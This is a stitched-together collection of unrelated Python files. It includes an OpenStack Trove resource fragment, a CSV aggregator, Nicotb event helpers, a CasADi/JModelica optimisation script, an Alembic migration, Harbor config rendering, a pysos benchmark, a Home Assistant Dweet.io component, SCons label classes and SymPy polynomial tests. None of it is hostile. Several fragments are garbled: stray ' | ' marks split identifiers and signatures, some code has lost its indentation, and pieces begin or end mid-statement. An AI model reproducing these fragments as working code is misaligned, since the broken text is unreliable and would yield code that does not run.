                                   'ACTION': self.DELETE}
                        prop_diff[self.DATABASES].append(deleted)
                updates.update({self.DATABASES: prop_diff[self.DATABASES]})
            if self.USERS in prop_diff:
                # Same CREATE/DELETE tagging for users.
                current = [u.name
                           for u in self.client().users.list(instance)]
                desired = [u[self.USER_NAME] for u in prop_diff[self.USERS]]
                for usr in prop_diff[self.USERS]:
                    if usr[self.USER_NAME] not in current:
                        usr['ACTION'] = self.CREATE
                for usr in current:
                    if usr not in desired:
                        prop_diff[self.USERS].append({self.USER_NAME: usr,
                                                      'ACTION': self.DELETE})
                updates.update({self.USERS: prop_diff[self.USERS]})
        return updates
def check_update_complete(self, updates):
instance = self.client().instances.get(self.resource_id)
if instance.status in self.BAD_STATUSES:
raise exception.ResourceInError(
resource_status=instance.sta | tus,
status_reason=self.TROVE_STATUS_REASON.get(instance.status,
_("Unknown")))
if updates:
if instance.status != self.ACTIVE:
dmsg = ("Instance is in status %(now)s. Waiting on status"
| " %(stat)s")
LOG.debug(dmsg % {"now": instance.status,
"stat": self.ACTIVE})
return False
try:
return (
self._update_name(instance, updates.get(self.NAME)) and
self._update_flavor(instance, updates.get(self.FLAVOR)) and
self._update_size(instance, updates.get(self.SIZE)) and
self._update_database |
#!/usr/bin/python
import re
import csv
import os
import json
def read_csv(fn):
    """Aggregate 'Total Transactions' rows of a collections CSV file.

    Returns a dict keyed by the first column; each value maps the metric
    names found in columns 2 and 4 to accumulated floats from columns 3
    and 5, plus a derived 'Throughput' = transactions / time.
    """
    results = {}
    # Text mode with newline='' is the Python 3 csv idiom; the original
    # opened the file in 'rb', which only worked on Python 2. The context
    # manager also guarantees the file is closed.
    with open(fn, 'r', newline='') as csvfile:
        for row in csv.reader(csvfile, delimiter=','):
            # Check the row length BEFORE indexing row[1]; the original
            # indexed first and raised IndexError on rows with < 2 columns.
            if len(row) == 7 and re.search('Total Transactions', row[1]):
                temp = results.get(row[0])
                if not temp:
                    results[row[0]] = {row[1]: float(row[2]),
                                       row[3]: float(row[4])}
                else:
                    results[row[0]] = {
                        row[1]: float(row[2]) + temp.get(row[1]),
                        row[3]: float(row[4]) + temp.get(row[3])}
                results[row[0]]['Throughput'] = (
                    results[row[0]][row[1]] / results[row[0]][row[3]])
    return results
def traverse_all_csvs(path_to_dir):
    """Return collections-*.csv filenames from the top level of a directory.

    Only the first os.walk() level is scanned, preserving the original
    behavior (it broke out of the walk after the first directory).
    """
    # Raw string avoids the invalid-escape warning for '\-', and the '.'
    # before 'csv' is now escaped so that names like 'collections-1Xcsv'
    # no longer match accidentally.
    pattern = re.compile(r'^collections-([\-D0-9]*)\.csv$')
    for dirpath, dirnames, filenames in os.walk(path_to_dir):
        return [fn for fn in filenames if pattern.search(fn)]
    return []
if __name__ == '__main__':
    # Aggregate every collections-*.csv next to this script into one summary,
    # written both as JSON and as a flat CSV table.
    results = {}
    files = traverse_all_csvs(os.path.dirname(os.path.realpath(__file__)))
    # Compile once; raw string and escaped '.' match traverse_all_csvs().
    pattern = re.compile(r'^collections-([\-D0-9]*)\.csv$')
    for fn in files:
        m = pattern.search(fn)
        results[m.group(1)] = read_csv(fn)
    # print statement and dict.iteritems() were Python-2-only; this version
    # runs on Python 3 (print function, items(), text-mode csv output).
    print(json.dumps(results, indent=4, separators=(',', ': ')))
    with open('compilation.json', 'w') as outfile:
        json.dump(results, outfile, sort_keys=True, indent=4,
                  separators=(',', ': '))
    rows = [['Type', 'Total Transactions', 'Time used', 'Throughput']]
    for key, value in results.items():
        rows.append([key, '-', '-', '-'])
        for k1, v1 in value.items():
            rows.append([k1, v1['Total Transactions'], v1['Time used'],
                         v1['Throughput']])
    with open('compilation.csv', 'w', newline='') as f:
        writer = csv.writer(f)
        writer.writerows(rows)
|
# Copyright (C) 2017,2019, Yu Sheng Lin, johnjohnlys@media.ee.ntu.edu.tw
# This file is part of Nicotb.
# Nicotb is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# Nicotb is distributed in the hope tha | t it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with Nicotb. If not, see <http://www.gnu.org/licenses/>.
from nicotb.common import *
from collections import deque
# Indices of destroyed events, available for reuse by CreateEvent.
event_released = set()
# waiting_coro[i] is the list of waiters registered on event i
# (presumably coroutines, per the name — the consumers are not in this file).
waiting_coro = list()
# Pending (event_index, all_ev) signals awaiting dispatch.
event_queue = deque()
def CreateEvent(hier: str | = ""):
if event_released:
n = event_released.pop()
else:
n = len(waiting_coro)
waiting_coro.append(list())
if COSIM and hier:
BindEvent(n, (TOP_PREFIX+hier).encode())
return n
def CreateEvents(descs: list):
    """Create one event per description and return their indices."""
    return list(map(CreateEvent, descs))
def GetEvent(ev):
    """Pass an existing event index through; otherwise create a new event."""
    if isinstance(ev, int):
        return ev
    return CreateEvent(ev)
def SignalEvent(ev, all_ev=True):
    """Queue event *ev* for signalling, carrying the all_ev flag.

    NOTE(review): the semantics of all_ev (wake all waiters vs. one) are
    decided wherever event_queue is drained, which is not in this file.
    """
    event_queue.append((ev, all_ev))
def DestroyEvent(ev: int):
    """Clear event *ev*'s waiter list and release its index for reuse."""
    # Do not destroy events created with hier name
    waiting_coro[ev] = []
    event_released.add(ev)
# Initialize a default event, so coroutines can implement SystemC-like dont_initialize
# The event is signalled immediately at import time.
INIT_EVENT = CreateEvent()
SignalEvent(INIT_EVENT)
|
#
# This file is part of CasADi.
#
# CasADi -- A symbolic framework for dynamic optimization.
# Copyright (C) 2010 by Joel Andersson, Moritz Diehl, K.U.Leuven. All rights reserved.
#
# CasADi is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# CasADi is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with CasADi; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
#
# -*- coding: utf-8 -*-
import os
import sys
from numpy import *
import numpy as NP
import matplotlib.pyplot as plt
import zipfile
# JModelica
from jmodelica.jmi import compile_jmu
from jmodelica.jmi import JMUModel
import jmodelica
# CasADi
from casadi import *
# Compile the Modelica/Optimica model to a JMU, falling back to the newer
# JModelica option name when the old one is rejected.
curr_dir = os.path.dirname(os.path.abspath(__file__));
try:
    # Try the old Jmodelica syntax
    jmu_name = compile_jmu("VDP_pack.VDP_Opt", curr_dir+"/VDP.mop",'optimica','ipopt',{'generate_xml_equations':True, 'generate_fmi_xml':False})
except jmodelica.compiler.UnknownOptionError:
    # Try the new jmodelica syntax
    jmu_name = compile_jmu("VDP_pack.VDP_Opt", curr_dir+"/VDP.mop",'optimica','ipopt',{'generate_xml_equations':True, 'generate_fmi_me_xml':False})
if True:
    # Reference solve with JModelica itself, plotted for comparison.
    vdp = JMUModel(jmu_name)
    res = vdp.optimize()
    # Extract variable profiles
    x1=res['x1']
    x2=res['x2']
    u=res['u']
    t=res['time']
    cost=res['cost']
    # Plot
    plt.figure(1)
    plt.clf()
    plt.subplot(311)
    plt.plot(t,x1)
    plt.grid()
    plt.ylabel('x1')
    plt.subplot(312)
    plt.plot(t,x2)
    plt.grid()
    plt.ylabel('x2')
    plt.subplot(313)
    plt.plot(t,u)
    plt.grid()
    plt.ylabel('u')
    plt.xlabel('time')
# Unpack the model description XML from the generated JMU archive and
# rename it for the CasADi FMI parser.
sfile = zipfile.ZipFile(curr_dir+'/VDP_pack_VDP_Opt.jmu','r')
mfile = sfile.extract('modelDescription.xml','.')
os.remove('VDP_pack_VDP_Opt.jmu')
os.rename('modelDescription.xml','vdp.xml')
# Allocate a parser and load the xml
parser = FMIParser('vdp.xml')
# Dump representation to screen
print "XML representation"
print parser
# Obtain the symbolic representation of the OCP
ocp = parser.parse()
# Print the ocp to screen
print ocp
# Sort the variables according to type
var = OCPVariables(ocp.variables)
# The right hand side of the ACADO functions
acado_in = ACADO_FCN_NUM_IN * [[]]
# Time
acado_in[ACADO_FCN_T] = [var.t_]
def toList(v, der=False):
    """Collect each element's der() (when *der* is true) or var() into a list."""
    accessor = (lambda item: item.der()) if der else (lambda item: item.var())
    return [accessor(item) for item in v]
# Map the parsed OCP variables onto the ACADO function input vector.
# Differential state
acado_in[ACADO_FCN_XD] = toList(ocp.x_)
# Algebraic state
acado_in[ACADO_FCN_XA] = toList(ocp.z_)
# Control
acado_in[ACADO_FCN_U] = toList(ocp.u_)
# Parameter
acado_in[ACADO_FCN_P] = toList(ocp.p_)
# State derivative
acado_in[ACADO_FCN_XDOT] = toList(ocp.x_,True)
# The DAE function
ffcn_out = list(ocp.dae) + list(ocp.ae)
ffcn = SXFunction(acado_in,[ffcn_out])
# Objective function
mfcn = SXFunction(acado_in,[ocp.mterm])
# Path constraint function
cfcn = SXFunction(acado_in,[ocp.cfcn])
# Initial constraint function
rfcn = SXFunction(acado_in,[ocp.initeq])
# Create ACADO solver
ocp_solver = AcadoInterface(ffcn,mfcn,cfcn,rfcn)
# Create an integrator for the same DAE (states = differential + algebraic).
dae_in = DAE_NUM_IN * [[]]
dae_in[DAE_T] = acado_in[ACADO_FCN_T]
dae_in[DAE_Y] = acado_in[ACADO_FCN_XD] + acado_in[ACADO_FCN_XA]
dae_in[DAE_YDOT] = acado_in[ACADO_FCN_XDOT] + list(ssym("zdot",len(acado_in[ACADO_FCN_XA])))
dae_in[DAE_P] = acado_in[ACADO_FCN_P] + acado_in[ACADO_FCN_U]
dae = SXFunction(dae_in,[ffcn_out])
integrator = IdasIntegrator(dae)
#integrator.setOption("exact_jacobian",True)
#integrator.setOption("linear_multistep_method","bdf") # adams or bdf
#integrator.setOption("nonlinear_solver_iteration","newton") # newton or functional
integrator.setOption("number_of_fwd_dir",4)
integrator.setOption("number_of_adj_dir",0)
integrator.setOption("fsens_err_con",True)
integrator.setOption("quad_err_con",True)
integrator.setOption("abstol",1e-8)
integrator.setOption("reltol",1e-8)
integrator.setOption("is_differential",len(acado_in[ACADO_FCN_XD])*[1] + len(acado_in[ACADO_FCN_XA])*[0])
# Pass the integrator to ACADO
ocp_solver.setIntegrator(integrator)
# Set options
ocp_solver.setOption("start_time",ocp.t0)
ocp_solver.setOption("final_time",ocp.tf)
num_nodes = 30
ocp_solver.setOption("number_of_shooting_nodes",num_nodes)
ocp_solver.setOption("max_num_iterations",100)
ocp_solver.setOption("kkt_tolerance",1e-4)
ocp_solver.setOption("integrator","casadi")
ocp_solver.setOption("integrator_tolerance",1e-6)
# Initialize
ocp_solver.init()
# Set bounds on states (path constraint bounds coerced to plain floats).
cfcn_lb = []
for i in ocp.cfcn_lb:
    cfcn_lb.append(float(i))
ocp_solver.setInput(cfcn_lb,"lbc")
cfcn_ub = []
for i in ocp.cfcn_ub:
    cfcn_ub.append(float(i))
ocp_solver.setInput(cfcn_ub,"ubc")
# Solve the optimal control problem
ocp_solver.solve()
# Print optimal cost
cost = ocp_solver.getOutputData(ACADO_COST)[0]
print "optimal cost = ", cost
# Print optimal parameters
popt = ocp_solver.getOutputData(ACADO_P_OPT)
print "optimal parameter values = ", popt
# Time grid
t_opt = NP.linspace(0,ocp.tf,num_nodes+1)
# Plot optimal control
u_opt = ocp_solver.getOutputData(ACADO_U_OPT)
plt.figure(3)
plt.plot(t_opt,u_opt)
# Plot optimal state trajectory
x_opt = ocp_solver.getOutputData(ACADO_X_OPT)
x_opt = array(x_opt) # create numpy array
x_opt = x_opt.reshape(num_nodes+1, 3)
plt.figure(4)
plt.plot(t_opt,x_opt)
# Show the plots
plt.ion()
plt.show()
|
"""empty message
Revision ID: 4fe34588268f
Revises: 26dba2ff3e74
Create Date: 2014-12-09 01:41:2 | 4.333058
"""
# revision identifiers, used by Alembic.
revision = '4fe34588268f'
down_revision = '26dba2ff3e74'
from alembic import op
import sqlalchemy as sa
def upgrade():
    """No-op upgrade: this revision introduces no schema changes."""
    ### commands auto generated by Alembic - please adjust! ###
    pass
    ### end Alembic commands ###
def downgrade | ():
### commands auto generated by Alembic - please adjust! ###
pass
### end Alembic commands ###
|
import os
| from g import config_dir, templates_dir, DEFAULT_GID, DEFAULT_UID
from utils.misc import prepare_dir
from utils.jinja import render_jinja
registryctl_config_dir = os.path.join(config_dir, "registryctl")
registryctl_config_template_path = os.path.join(templates_dir, "registryctl", "config.yml.jinja")
registryctl_conf = os.path.join(config_ | dir, "registryctl", "config.yml")
registryctl_env_template_path = os.path.join(templates_dir, "registryctl", "env.jinja")
registryctl_conf_env = os.path.join(config_dir, "registryctl", "env")
levels_map = {
'debug': 'debug',
'info': 'info',
'warning': 'warn',
'error': 'error',
'fatal': 'fatal'
}
def prepare_registry_ctl(config_dict):
    """Render the registryctl env and config files from their templates.

    Creates the registryctl config directory, then renders the env file and
    the config.yml. Raises KeyError if config_dict['log_level'] is not a
    key of levels_map.
    """
    # prepare dir
    prepare_dir(registryctl_config_dir)
    # Render Registryctl env
    render_jinja(
        registryctl_env_template_path,
        registryctl_conf_env,
        **config_dict)
    # Render Registryctl config
    render_jinja(
        registryctl_config_template_path,
        registryctl_conf,
        uid=DEFAULT_UID,
        gid=DEFAULT_GID,
        level=levels_map[config_dict['log_level']],
        **config_dict)
|
import time
import test_rnd as rnd
import random
import pysos
# Micro-benchmark of pysos.Dict: times bulk add / read / update / delete /
# re-add cycles over N random UTF-8 key/value pairs.
# initialize the data
N = 1234
items = [(rnd.utf8(20), rnd.utf8(200)) for i in range(N)]
start = time.time()
db = pysos.Dict('temp/sos_dict')
#import shelve
#db = shelve.open('temp.shelve')
print("%.2fs: %d items loaded" % (time.time() - start, len(db)))
# add all items
for key,val in items:
    db[key] = val
print("%.2fs: %d items added" % (time.time() - start, len(items)))
# read all keys
random.shuffle(items)
for key,val in items:
    val2 = db[key]
    assert val2 == val
print("%.2fs: %d items read" % (time.time() - start, len(items)))
# update all values
random.shuffle(items)
for key,val in items:
    db[key] = 'updated ' + val
print("%.2fs: %d items updated" % (time.time() - start, len(items)))
# read all keys again
random.shuffle(items)
for key,val in items:
    val2 = db[key]
    assert val2 == 'updated ' + val
print("%.2fs: %d items read" % (time.time() - start, len(items)))
# delete all keys
random.shuffle(items)
for key,val in items:
    del db[key]
print("%.2fs: %d items deleted" % (time.time() - start, len(items)))
# add all keys
random.shuffle(items)
for key,val in items:
    db[key] ='again ' + val
print("%.2fs: %d items added" % (time.time() - start, len(items)))
# read all keys again
random.shuffle(items)
for key,val in items:
    # NOTE(review): this pass overwrites val without asserting; presumably a
    # pure read-timing pass — confirm no verification was intended here.
    val = db[key]
print("%.2fs: %d items read" % (time.time() - start, len(items)))
N = len(db)
db.close()
print("%.2fs: DB closed containing %d item" % (time.time() - start, N))
#print("free lines: %d" % len(db._free_lines))
|
import sys
import argparse
import pickle
def read_index(pickleFile):
    """Load and return a pickled index from the file at path *pickleFile*.

    Uses a context manager so the file handle is always closed; the original
    leaked the handle and also shadowed the path argument with the open
    file object.
    """
    with open(pickleFile, 'rb') as handle:
        return pickle.load(handle)
def main(args):
    """Print the index entry for each word requested on the command line.

    Words absent from the index print None instead of raising KeyError
    (the original crashed on unknown words).
    """
    word_index = read_index('indice.pickle')
    doc_index = read_index('indice_doc.pickle')  # loaded for parity; unused
    for word in args.palabras:
        # print() is valid on both Python 2 and 3 for a single argument;
        # the original used the Python-2-only print statement.
        print(word_index.get(word))
if __name__ == '__main__':
    # Parse the positional word list and run the lookup.
    arg_parser = argparse.ArgumentParser(description='Busca palabras')
    arg_parser.add_argument('palabras', metavar='N', type=str, nargs='+',
                            help='Palabras a buscar en el indice')
    main(arg_parser.parse_args())
|
"""
A component which allows you to send data to Dweet.io.
For more details about this component, please refer to the documentation at
https://home-assistant.io/components/dweet/
"""
import logging
from datetime import timedelta
import voluptuous as vol
from homeassistant.const import EVENT_STATE_CHANGED, STATE_UNKNOWN
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers import state as state_helper
from homeassistant.util import Throttle
_LOGGER = logging.getLogger(__name__)
# Home Assistant component domain.
DOMAIN = "dweet"
DEPENDENCIES = []
REQUIREMENTS = ['dweepy==0.2.0']
CONF_NAME = 'name'
CONF_WHITELIST = 'whitelist'
# Rate limit applied to dweet_for() calls via @Throttle on send_data().
MIN_TIME_BETWEEN_UPDATES = timedelta(seconds=1)
CONFIG_SCHEMA = vol.Schema({
    DOMAIN: vol.Schema({
        vol.Required(CONF_NAME): cv.string,
        # NOTE(review): validated as a single string here, but setup() uses
        # it as a collection of entity_ids (`entity_id not in whitelist`),
        # which on a string is a substring test — confirm intended schema.
        vol.Required(CONF_WHITELIST): cv.string,
    }),
}, extra=vol.ALLOW_EXTRA)
# pylint: disable=too-many-locals
def setup(hass, config):
    """Setup the Dweet.io component.

    Registers a state-change listener that forwards whitelisted entity
    states to Dweet.io under the configured thing name.
    """
    conf = config[DOMAIN]
    name = conf[CONF_NAME]
    whitelist = conf.get(CONF_WHITELIST, [])
    # Accumulates the latest value per friendly_name across all events.
    json_body = {}
    def dweet_event_listener(event):
        """Listen for new messages on the bus and sends them to Dweet.io."""
        state = event.data.get('new_state')
        # Skip deletions, unknown/empty states, and non-whitelisted entities.
        if state is None or state.state in (STATE_UNKNOWN, '') \
                or state.entity_id not in whitelist:
            return
        try:
            _state = state_helper.state_as_number(state)
        except ValueError:
            # Non-numeric states are forwarded verbatim.
            _state = state.state
        json_body[state.attributes.get('friendly_name')] = _state
        send_data(name, json_body)
    hass.bus.listen(EVENT_STATE_CHANGED, dweet_event_listener)
    return True
@Throttle(MIN_TIME_BETWEEN_UPDATES)
def send_data(name, msg):
    """Send the collected data to Dweet.io.

    Throttled to at most one call per MIN_TIME_BETWEEN_UPDATES; errors from
    dweepy are logged rather than raised.
    """
    # Imported lazily so the third-party dependency is only required at
    # runtime, after REQUIREMENTS has been installed.
    import dweepy
    try:
        dweepy.dweet_for(name, msg)
    except dweepy.DweepyError:
        _LOGGER.error("Error saving data '%s' to Dweet.io", msg)
|
# Copyright (c) 2013 Che-Liang Chiou
import os
import re
from SCons.Script import Dir
class Label(object):
    """A '#package:target' build label, split into package and target parts."""

    # Characters permitted in package and target names.
    VALID_NAME = re.compile(r'^[A-Za-z0-9_.\-/]+$')

    @classmethod
    def make_label(cls, label_str):
        """Parse a label from a string or a SCons File node.

        Accepts '#package:target', '#package', ':target', bare 'target', or
        a non-str object treated as a File node whose source path supplies
        both parts.
        """
        package_str = None
        target_str = None
        if not isinstance(label_str, str):
            # Assume it is a SCons File node.
            label_str = label_str.srcnode().path
            package_str, target_str = os.path.split(label_str)
        elif label_str.startswith('#'):
            label_str = label_str[1:]
            if ':' in label_str:
                package_str, target_str = label_str.split(':', 1)
            else:
                package_str = label_str
        elif label_str.startswith(':'):
            target_str = label_str[1:]
        else:
            target_str = label_str
        package_name = PackageName.make_package_name(package_str)
        if not target_str:
            # Default the target to the package path's basename.
            target_str = os.path.basename(package_name.path)
        target_name = TargetName(target_str)
        return cls(package_name, target_name)

    @classmethod
    def make_label_list(cls, label_strs):
        """Parse a whitespace-separated string or an iterable into labels."""
        if isinstance(label_strs, str):
            label_strs = label_strs.split()
        return [cls.make_label(label_str) for label_str in label_strs]

    @staticmethod
    def check_name(name):
        """Raise ValueError unless *name* is a well-formed name component."""
        if not name:
            raise ValueError('empty name')
        if name.startswith('/') or name.endswith('/'):
            raise ValueError('leading or trailing path separator: %s' % name)
        if '//' in name:
            raise ValueError('consecutive path separators: %s' % name)
        if not Label.VALID_NAME.match(name):
            raise ValueError('invalid name character: %s' % name)

    def __init__(self, package_name, target_name):
        assert isinstance(package_name, PackageName)
        assert isinstance(target_name, TargetName)
        self.package_name = package_name
        self.target_name = target_name

    def __str__(self):
        return '#%s:%s' % (self.package_name, self.target_name)

    def __repr__(self):
        return '%s("%s")' % (self.__class__.__name__, str(self))

    def __eq__(self, other):
        return (self.__class__ is other.__class__ and
                self.package_name == other.package_name and
                self.target_name == other.target_name)

    def __ne__(self, other):
        return not (self == other)

    def __hash__(self):
        # Hash via repr, which includes the concrete class name.
        return hash(repr(self))

    @property
    def path(self):
        """Filesystem-style path: package path joined with target path."""
        return os.path.join(self.package_name.path, self.target_name.path)
class LabelOfRule(Label):
    """Marker subclass of Label for rule labels (distinguished via __eq__)."""
    pass
class LabelOfFile(Label):
    """Marker subclass of Label for file labels (distinguished via __eq__)."""
    pass
class PackageName(object):
    """Validated, hashable wrapper around a package path string."""

    @classmethod
    def make_package_name(cls, package_str=None):
        """Build a PackageName, defaulting to the current SCons source dir."""
        assert package_str is None or isinstance(package_str, str)
        return cls(package_str if package_str else Dir('.').srcnode().path)

    def __init__(self, package_name):
        assert isinstance(package_name, str)
        Label.check_name(package_name)
        self.package_name = package_name

    def __str__(self):
        return self.package_name

    def __repr__(self):
        return 'PackageName("%s")' % self.package_name

    def __eq__(self, other):
        if self.__class__ is not other.__class__:
            return False
        return self.package_name == other.package_name

    def __ne__(self, other):
        return not self.__eq__(other)

    def __hash__(self):
        return hash(self.package_name)

    @property
    def path(self):
        """The package name used directly as a filesystem path."""
        return self.package_name
class TargetName(object):
    """Validated, hashable wrapper around a target name string."""

    def __init__(self, target_name):
        assert isinstance(target_name, str)
        Label.check_name(target_name)
        self.target_name = target_name

    def __str__(self):
        return self.target_name

    def __repr__(self):
        return 'TargetName("%s")' % self.target_name

    def __eq__(self, other):
        if self.__class__ is not other.__class__:
            return False
        return self.target_name == other.target_name

    def __ne__(self, other):
        return not self.__eq__(other)

    def __hash__(self):
        return hash(self.target_name)

    @property
    def path(self):
        """The target name used directly as a filesystem path component."""
        return self.target_name
|
ssert re(roots[1]) == -0.5
assert im(roots[1]).epsilon_eq(-0.86602, eps) is S.false
assert re(roots[2]) == -0.5
assert im(roots[2]).epsilon_eq(+0.86602, eps) is S.false
assert re(roots[3]).epsilon_eq(+0.87743, eps) is S.false
assert im(roots[3]).epsilon_eq(-0.74486, eps) is S.false
assert re(roots[4]).epsilon_eq(+0.87743, eps) is S.false
assert im(roots[4]).epsilon_eq(+0.74486, eps) is S.false
raises(DomainError, lambda: Poly(x + y, x).nroots())
raises(MultivariatePolynomialError, lambda: Poly(x + y).nroots())
assert nroots(x**2 - 1) == [-1.0, 1.0]
roots = nroots(x**2 - 1)
assert roots == [-1.0, 1.0]
assert nroots(x + I) == [-1.0*I]
assert nroots(x + 2*I) == [-2.0*I]
raises(PolynomialError, lambda: nroots(0))
# issue 8296
f = Poly(x**4 - 1)
assert f.nroots(2) == [w.n(2) for w in f.all_roots()]
def test_ground_roots():
    """Ground-domain roots with multiplicities, via method and function."""
    expr = x**6 - 4*x**4 + 4*x**3 - x**2
    expected = {S(1): 2, S(0): 2}
    assert Poly(expr).ground_roots() == expected
    assert ground_roots(expr) == expected
def test_nth_power_roots_poly():
    """nth_power_roots_poly for n in {1, 2, 3, 4, 12} plus error cases."""
    f = x**4 - x**2 + 1
    assert nth_power_roots_poly(f, 1) == f
    raises(ValueError, lambda: nth_power_roots_poly(f, 0))
    raises(ValueError, lambda: nth_power_roots_poly(f, x))
    expected_factored = {
        2: (x**2 - x + 1)**2,
        3: (x**2 + 1)**2,
        4: (x**2 + x + 1)**2,
        12: (x - 1)**4,
    }
    for power, factored in expected_factored.items():
        assert factor(nth_power_roots_poly(f, power)) == factored
    raises(MultivariatePolynomialError, lambda: nth_power_roots_poly(
        x + y, 2, x, y))
def test_torational_factor_list():
    """_torational_factor_list on sqrt(2)- and 2**(1/4)-substituted polys."""
    p = expand(((x**2 - 1)*(x - 2)).subs({x: x*(1 + sqrt(2))}))
    expected = (-2, [
        (-x*(1 + sqrt(2))/2 + 1, 1),
        (-x*(1 + sqrt(2)) - 1, 1),
        (-x*(1 + sqrt(2)) + 1, 1)])
    assert _torational_factor_list(p, x) == expected
    q = expand(((x**2 - 1)*(x - 2)).subs({x: x*(1 + 2**Rational(1, 4))}))
    # No rational factorization exists for the quartic-root substitution.
    assert _torational_factor_list(q, x) is None
def test_cancel():
    """Exercise cancel() on scalars, rationals, Polys, radicals, Piecewise."""
    # Trivial / scalar inputs.
    assert cancel(0) == 0
    assert cancel(7) == 7
    assert cancel(x) == x
    assert cancel(oo) == oo
    assert cancel((2, 3)) == (1, 2, 3)
    assert cancel((1, 0), x) == (1, 1, 0)
    assert cancel((0, 1), x) == (1, 0, 1)
    # Pair form (numerator, denominator) in expr and Poly variants.
    f, g, p, q = 4*x**2 - 4, 2*x - 2, 2*x + 2, 1
    F, G, P, Q = [ Poly(u, x) for u in (f, g, p, q) ]
    assert F.cancel(G) == (1, P, Q)
    assert cancel((f, g)) == (1, p, q)
    assert cancel((f, g), x) == (1, p, q)
    assert cancel((f, g), (x,)) == (1, p, q)
    assert cancel((F, G)) == (1, P, Q)
    assert cancel((f, g), polys=True) == (1, P, Q)
    assert cancel((F, G), polys=False) == (1, p, q)
    # greedy=False is required to cancel through radical denominators.
    f = (x**2 - 2)/(x + sqrt(2))
    assert cancel(f) == f
    assert cancel(f, greedy=False) == x - sqrt(2)
    f = (x**2 - 2)/(x - sqrt(2))
    assert cancel(f) == f
    assert cancel(f, greedy=False) == x + sqrt(2)
    assert cancel((x**2/4 - 1, x/2 - 1)) == (S(1)/2, x + 2, 1)
    assert cancel((x**2 - y)/(x - y)) == 1/(x - y)*(x**2 - y)
    assert cancel((x**2 - y**2)/(x - y), x) == x + y
    assert cancel((x**2 - y**2)/(x - y), y) == x + y
    assert cancel((x**2 - y**2)/(x - y)) == x + y
    assert cancel((x**3 - 1)/(x**2 - 1)) == (x**2 + x + 1)/(x + 1)
    assert cancel((x**3/2 - S(1)/2)/(x**2 - 1)) == (x**2 + x + 1)/(2*x + 2)
    assert cancel((exp(2*x) + 2*exp(x) + 1)/(exp(x) + 1)) == exp(x) + 1
    f = Poly(x**2 - a**2, x)
    g = Poly(x - a, x)
    F = Poly(x + a, x)
    G = Poly(1, x)
    assert cancel((f, g)) == (1, F, G)
    f = x**3 + (sqrt(2) - 2)*x**2 - (2*sqrt(2) + 3)*x - 3*sqrt(2)
    g = x**2 - 2
    assert cancel((f, g), extension=True) == (1, x**2 - 2*x - 3, x - sqrt(2))
    f = Poly(-2*x + 3, x)
    g = Poly(-x**9 + x**8 + x**6 - x**5 + 2*x**2 - 3*x + 1, x)
    assert cancel((f, g)) == (1, -f, -g)
    # Domain unification: ZZ(x) and ZZ[x] operands produce ZZ(x) results.
    f = Poly(y, y, domain='ZZ(x)')
    g = Poly(1, y, domain='ZZ[x]')
    assert f.cancel(
        g) == (1, Poly(y, y, domain='ZZ(x)'), Poly(1, y, domain='ZZ(x)'))
    assert f.cancel(g, include=True) == (
        Poly(y, y, domain='ZZ(x)'), Poly(1, y, domain='ZZ(x)'))
    f = Poly(5*x*y + x, y, domain='ZZ(x)')
    g = Poly(2*x**2*y, y, domain='ZZ(x)')
    assert f.cancel(g, include=True) == (
        Poly(5*y + 1, y, domain='ZZ(x)'), Poly(2*x*y, y, domain='ZZ(x)'))
    f = -(-2*x - 4*y + 0.005*(z - y)**2)/((z - y)*(-z + y + 2))
    assert cancel(f).is_Mul == True
    P = tanh(x - 3.0)
    Q = tanh(x + 3.0)
    f = ((-2*P**2 + 2)*(-P**2 + 1)*Q**2/2 + (-2*P**2 + 2)*(-2*Q**2 + 2)*P*Q - (-2*P**2 + 2)*P**2*Q**2 + (-2*Q**2 + 2)*(-Q**2 + 1)*P**2/2 - (-2*Q**2 + 2)*P**2*Q**2)/(2*sqrt(P**2*Q**2 + 0.0001)) \
        + (-(-2*P**2 + 2)*P*Q**2/2 - (-2*Q**2 + 2)*P**2*Q/2)*((-2*P**2 + 2)*P*Q**2/2 + (-2*Q**2 + 2)*P**2*Q/2)/(2*(P**2*Q**2 + 0.0001)**(S(3)/2))
    assert cancel(f).is_Mul == True
    # issue 7022
    A = Symbol('A', commutative=False)
    p1 = Piecewise((A*(x**2 - 1)/(x + 1), x > 1), ((x + 2)/(x**2 + 2*x), True))
    p2 = Piecewise((A*(x - 1), x > 1), (1/x, True))
    assert cancel(p1) == p2
    assert cancel(2*p1) == 2*p2
    assert cancel(1 + p1) == 1 + p2
    assert cancel((x**2 - 1)/(x + 1)*p1) == (x - 1)*p2
    assert cancel((x**2 - 1)/(x + 1) + p1) == (x - 1) + p2
    p3 = Piecewise(((x**2 - 1)/(x + 1), x > 1), ((x + 2)/(x**2 + 2*x), True))
    p4 = Piecewise(((x - 1), x > 1), (1/x, True))
    assert cancel(p3) == p4
    assert cancel(2*p3) == 2*p4
    assert cancel(1 + p3) == 1 + p4
    assert cancel((x**2 - 1)/(x + 1)*p3) == (x - 1)*p4
    assert cancel((x**2 - 1)/(x + 1) + p3) == (x - 1) + p4
    # issue 9363
    M = MatrixSymbol('M', 5, 5)
    assert cancel(M[0,0] + 7) == M[0,0] + 7
    expr = sin(M[1, 4] + M[2, 1] * 5 * M[4, 0]) - 5 * M[1, 2] / z
    assert cancel(expr) == expr
def test_reduced():
    """reduced() / GroebnerBasis.reduce(): quotients and remainder."""
    f = 2*x**4 + y**2 - x**2 + y**3
    G = [x**3 - x, y**3 - y]
    Q = [2*x, 1]
    r = x**2 + y**2 + y
    assert reduced(f, G) == (Q, r)
    assert reduced(f, G, x, y) == (Q, r)
    H = groebner(G)
    assert H.reduce(f) == (Q, r)
    # Same checks with Poly outputs, compared strictly (incl. generators).
    Q = [Poly(2*x, x, y), Poly(1, x, y)]
    r = Poly(x**2 + y**2 + y, x, y)
